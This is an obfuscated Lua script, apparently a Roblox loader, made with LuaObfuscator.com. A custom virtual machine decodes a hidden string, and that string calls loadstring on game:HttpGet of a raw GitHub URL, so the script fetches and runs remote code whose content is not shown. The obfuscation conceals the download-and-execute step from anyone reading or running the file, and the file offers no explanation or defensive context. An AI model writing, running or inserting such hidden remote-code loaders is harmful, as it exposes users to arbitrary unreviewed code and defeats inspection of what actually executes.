--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=0;local v91;while true do if (v90==0) then v91=v2(v0(v30,16));if v19 then local v122=v5(v91,v19);v19=nil;return v122;else return v91;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v92=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 58 + 6)))) + (932 -(857 + 74)))) ;return v92-(v92%((810 -241) -(367 + (1266 -(68 + 997))))) ;else local v93=927 -(214 + 713) ;local v94;while true do if (v93==(0 + 0)) then v94=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v94 + v94))>=v94) and 1) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1270 -((538 -312) + 1044) ;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * (373 -((58 -26) + 85))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;v35=958 -(892 + 65) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -(1 + 0)) );v18=v18 + (354 -(87 + 263)) ;return (v41 * (16777396 -(67 + (277 -164)))) + (v40 * 65536) + (v39 * 256) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 -0)) then v43=v23();v44=v23();v42=953 -((1418 -616) + 150) ;end if (v42==3) then if (v47==((438 -(145 + 293)) -0)) then if (v46==(0 -0)) then return v48 * 0 ;else v47=1 + 0 ;v45=(1427 -(44 + 386)) -((2401 -(998 + 488)) + 82) ;end elseif (v47==(5796 -3749)) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/(1187 -(1069 + 118))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((4 -2)^((36 + 77) -61)))) ;end if (v42==(1 + 0 + 1)) then v47=v20(v44,21,54 -(795 -(201 + 571)) );v48=((v20(v44,(1170 -(116 + 1022)) + 0 )==1) and  -1) or (792 -(368 + 423)) ;v42=9 -6 ;end if (v42==(19 -(10 + 8))) then v45=3 -(8 -6) ;v46=(v20(v44,1,462 -(416 + 26) ) * (2^((60 + 42) -70))) + v43 ;v42=1 + 1 ;end end end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==1) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=(1087 -(1020 + 60)) -5 ;end if (v50==3) then return v6(v52);end if (v50==(7 -5)) then v52={};for v113=860 -(814 + 45) , #v51 do v52[v113]=v2(v1(v3(v51,v113,v113)));end v50=(1430 -(630 + 793)) -(13 -9) ;end if (v50==0) then v51=nil;if  not v49 then local v119=(0 -0) + 0 ;while true do if (v119==(0 + 0)) then v49=v23();if (v49==(885 -(103 + 158 + 624))) then return "";end break;end end end v50=1 -0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 1763 -(454 + 1309) ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104~=0) then else local v120=(function() return 0 + 0 ;end)();while true do if (v120~=(0 -0)) then else v95=(function() return 0 -0 ;end)();v96=(function() return nil;end)();v120=(function() return 1;end)();end if (v120~=(2 -1)) then else v104=(function() return 1;end)();break;end end end if (v104==1) then local v121=(function() return 0;end)();while true do if (v121~=0) then else while true do if (v95~=0) then else v96=(function() return v97();end)();if (v98(v96, #"{", #"]")~=(285 -(134 + 151))) then else local v166=(function() return 1665 -(970 + 695) ;end)();local v167=(function() return;end)();local v168=(function() return;end)();local v169=(function() return;end)();local v170=(function() return;end)();while true do if (v166~=(0 -0)) then else local v174=(function() return 0;end)();while true do if (v174==(1990 -(582 + 1408))) then v167=(function() return 0;end)();v168=(function() return nil;end)();v174=(function() return 1;end)();end if (v174~=(3 -2)) then else v166=(function() return 1 -0 ;end)();break;end end end if (v166==1) then local v175=(function() return 0;end)();local v176=(function() return;end)();while true do if (v175~=0) then else v176=(function() return 0 -0 ;end)();while true do if ((1824 -(1195 + 629))~=v176) then else v169=(function() return nil;end)();v170=(function() return nil;end)();v176=(function() return 1;end)();end if (v176~=1) then else v166=(function() return 2;end)();break;end end break;end end end if (v166==(2 -0)) then while true do if (v167== #",") then local v177=(function() return 0;end)();while true do if (1~=v177) then else v167=(function() return 2;end)();break;end if ((241 -(187 + 54))~=v177) then else v170=(function() return {v99(),v99(),nil,nil};end)();if (v168==(0 + 0)) then local v184=(function() return 0;end)();local v185=(function() return;end)();while true do if (v184~=(0 + 0)) then else v185=(function() return 0;end)();while true do if (v185==0) then v170[ #"xxx"]=(function() return v99();end)();v170[ #".com"]=(function() return v99();end)();break;end end break;end end elseif (v168== #"|") then v170[ #"-19"]=(function() return v100();end)();elseif (v168==(3 -1)) then v170[ #"gha"]=(function() return v100() -((2 -0)^16) ;end)();elseif (v168== #"xxx") then local v192=(function() return 0 + 0 ;end)();local v193=(function() return;end)();while true do if (v192==0) then v193=(function() return 1636 -(1373 + 263) ;end)();while true do if (v193==(1000 -(451 + 549))) then v170[ #"-19"]=(function() return v100() -((1 + 1)^16) ;end)();v170[ #"?id="]=(function() return v99();end)();break;end end break;end end end v177=(function() return 1 -0 ;end)();end end end if (v167==2) then local v178=(function() return 0;end)();local v179=(function() return;end)();while true do if (v178~=(0 -0)) then else v179=(function() return 1384 -(746 + 638) ;end)();while true do if (v179==(1 + 0)) then v167=(function() return  #"-19";end)();break;end if (v179==0) then if (v98(v169, #"\\", #"|")== #"]") then v170[2]=(function() return v101[v170[2]];end)();end if (v98(v169,2,2 -0 )== #"<") then v170[ #"xxx"]=(function() return v101[v170[ #"91("]];end)();end v179=(function() return 1;end)();end end break;end end end if (v167~= #"nil") then else if (v98(v169, #"91(", #"xnx")== #"|") then v170[ #"?id="]=(function() return v101[v170[ #".com"]];end)();end v102[v103]=(function() return v170;end)();break;end if (v167~=(341 -(218 + 123))) then else local v181=(function() return 1581 -(1535 + 46) ;end)();local v182=(function() return;end)();while true do if (v181==(0 + 0)) then v182=(function() return 0 + 0 ;end)();while true do if (v182~=(560 -(306 + 254))) then else v168=(function() return v98(v96,1 + 1 , #"nil");end)();v169=(function() return v98(v96, #"xnxx",11 -5 );end)();v182=(function() return 1;end)();end if (v182==(1468 -(899 + 568))) then v167=(function() return  #":";end)();break;end end break;end end end end break;end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end;end)();local v54=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();local v109=(function() return;end)();while true do if (v108~=(0 + 0)) then else v109=(function() return 0 -0 ;end)();while true do if (v109==0) then local v124=(function() return 603 -(268 + 335) ;end)();local v125=(function() return;end)();while true do if (v124==(290 -(60 + 230))) then v125=(function() return 0;end)();while true do if ((572 -(426 + 146))~=v125) then else v105[v106-#"]" ]=(function() return v107();end)();return v105,v106,v107;end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #",",v59 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69==(0 + 0)) then v70=(function() return 1456 -(282 + 1174) ;end)();v71=(function() return nil;end)();v69=(function() return 1;end)();end if (v69==(812 -(569 + 242))) then v72=(function() return nil;end)();while true do if ((0 -0)~=v70) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 1 + 0 ;end)();end if (v70~=1) then else if (v71== #":") then v72=(function() return v21()~=(1024 -(706 + 318)) ;end)();elseif (v71==(1253 -(721 + 530))) then v72=(function() return v24();end)();elseif (v71== #"-19") then v72=(function() return v25();end)();end v60[v68]=(function() return v72;end)();break;end end break;end end end v58[ #"xnx"]=(function() return v21();end)();for v73= #"~",v23() do FlatIdent_287B5,Descriptor,v21,v20,v22,v23,v60,v55,v73=(function() return v53(FlatIdent_287B5,Descriptor,v21,v20,v22,v23,v60,v55,v73);end)();end for v74= #" ",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[(993 + 279) -(945 + (452 -(116 + 10))) ];local v66=v62[4 -2 ];local v67=v62[3 + 0 ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=701 -(271 + 429) ;local v80= -(1 + 0 + 0);local v81={};local v82={...};local v83=v12("#",...) -(1501 -(1408 + 92)) ;local v84={};local v85={};for v110=1086 -(461 + 625) ,v83 do if ((1853<4813) and (v110>=v77)) then v81[v110-v77 ]=v82[v110 + 1 ];else v85[v110]=v82[v110 + (1289 -(993 + 295)) ];end end local v86=(v83-v77) + (739 -(542 + 196)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1 + 0 ];if (v88<=(1174 -(418 + 753))) then if ((v88<=(1 + 0)) or (2821<2431)) then if ((v88==0) or (2874<2181)) then local v126;local v127,v128;local v129;local v130;v85[v87[1 + 1 ]]=v64[v87[3]];v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[1 + 1 ]]=v64[v87[532 -((870 -464) + 123) ]];v79=v79 + (1770 -(1749 + 20)) ;v87=v75[v79];v130=v87[2];v129=v85[v87[3]];v85[v130 + 1 + 0 ]=v129;v85[v130]=v129[v87[1326 -(365 + 884 + 73) ]];v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[1147 -(466 + 679) ]]=v87[3];v79=v79 + (2 -(1 + 0)) ;v87=v75[v79];v130=v87[5 -(2 + 1) ];v127,v128=v78(v85[v130](v13(v85,v130 + 1 ,v87[1903 -(106 + 1794) ])));v80=(v128 + v130) -(1 + 0) ;v126=0 + 0 ;for v160=v130,v80 do v126=v126 + (2 -1) ;v85[v160]=v127[v126];end v79=v79 + 1 ;v87=v75[v79];v130=v87[5 -3 ];v85[v130]=v85[v130](v13(v85,v130 + (115 -(4 + 110)) ,v80));v79=v79 + (585 -(57 + 527)) ;v87=v75[v79];v85[v87[4 -2 ]]();v79=v79 + (1428 -(41 + (3553 -2167))) ;v87=v75[v79];do return;end else v85[v87[105 -(17 + 86) ]]=v87[3 + 0 ];end elseif (v88>((1554 -(1126 + 425)) -1)) then local v146=v87[5 -3 ];local v147=v85[v87[169 -(122 + 44) ]];v85[v146 + ((406 -(118 + 287)) -0) ]=v147;v85[v146]=v147[v87[12 -8 ]];else local v151=0 + 0 ;local v152;local v153;local v154;local v155;while true do if ((v151==(1 + 1)) or (2689<=343)) then for v164=v152,v80 do local v165=0 -0 ;while true do if (v165==(65 -(30 + 35))) then v155=v155 + 1 + 0 ;v85[v164]=v153[v155];break;end end end break;end if ((v151==1) or (1869==2009)) then v80=(v154 + v152) -(1258 -(1043 + 214)) ;v155=0 -0 ;v151=1214 -(323 + 889) ;end if ((v151==(0 -0)) or (3546<2322)) then v152=v87[(1126 -(118 + 1003)) -3 ];v153,v154=v78(v85[v152](v13(v85,v152 + 1 ,v87[3])));v151=(1700 -1119) -(361 + 219) ;end end end elseif ((v88<=(325 -(53 + 267))) or (2082==4773)) then if (v88==(1 + 3)) then v85[v87[415 -(15 + 398) ]]=v64[v87[985 -(18 + 964) ]];else v85[v87[7 -5 ]]();end elseif ((3244>1055) and (v88>(4 + 2))) then do return;end else local v158=v87[2];v85[v158]=v85[v158](v13(v85,v158 + 1 + 0 ,v80));end v79=v79 + (851 -(20 + 830)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A7573746172616E646F6D6775792D75782F4E65776F6E652F6D61696E2F446F6E277400083O00124O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
